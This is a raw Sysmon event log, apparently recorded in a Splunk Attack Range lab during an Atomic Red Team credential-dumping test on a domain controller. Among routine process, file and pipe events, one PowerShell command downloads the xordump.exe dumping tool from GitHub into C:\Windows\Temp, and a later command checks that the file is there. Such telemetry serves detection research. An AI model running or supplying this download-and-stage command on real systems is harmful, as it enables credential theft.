21:10:07.327{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025361Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.341{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest \""https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe\"" -OutFile C:\Windows\Temp\xordump.exe} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025360Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.327{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025359Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.327{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025358Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.311{4DB9351A-A32F-60D3-4B06-00000000CF01}3980ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025357Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.233{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025356Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.233{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025355Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.202{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=420DF6D86CD96D553816769F4BA5F3C2,SHA256=A8CC5EE09A0AE93D7A01B530913DFE9D4A312FE14803723A945F5842AD0D15D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025354Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.186{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025353Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.186{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025352Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:07.170{4DB9351A-A32F-60D3-4B06-00000000CF01}3980\PSHost.132689562070882307.3980.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025351Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.155{4DB9351A-A32F-60D3-4B06-00000000CF01}3980ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1surpvfh.jit.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025350Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.155{4DB9351A-A32F-60D3-4B06-00000000CF01}3980ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lbwacldr.o5k.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025349Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.139{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lbwacldr.o5k.ps12021-06-23 21:10:07.139 10341000x800000000000000025348Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025347Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.108{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9DB592F0DAE85FDAFE615D94FE300EA,SHA256=24472894D1A9BD3674BE52AC3A84D3AB54CAD7B0712F39225D104EB5B68232FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025346Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.092{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025345Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.077{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025344Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025343Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025342Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025341Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025340Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.077{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025339Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.077{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025338Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.088{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path 'C:\Windows\Temp\xordump.exe') {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025337Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.030{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CFCBC435E1D166BF70C65D79B47AD133,SHA256=640CB190965FE0A2D3D5B1272B17C98F324D46ECAE16869DE6AD42EEAFC0B044,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000025383Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.665{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local60082- 23542300x800000000000000025382Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:08.389{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B32EF1375A7AC2359056BE8959BCDB80,SHA256=109DB63C2083E1D9A38B6AFAD2DE253C82962802F4C86FDF1A61E12B22ED44B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025381Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:08.077{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95FABB924CF93F462CEC98209C0E2C59,SHA256=091374A7B9564BFEFC22FAE05058EB7360529603EB6C12E18C53C5B9CB5A5C9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025380Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:08.030{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 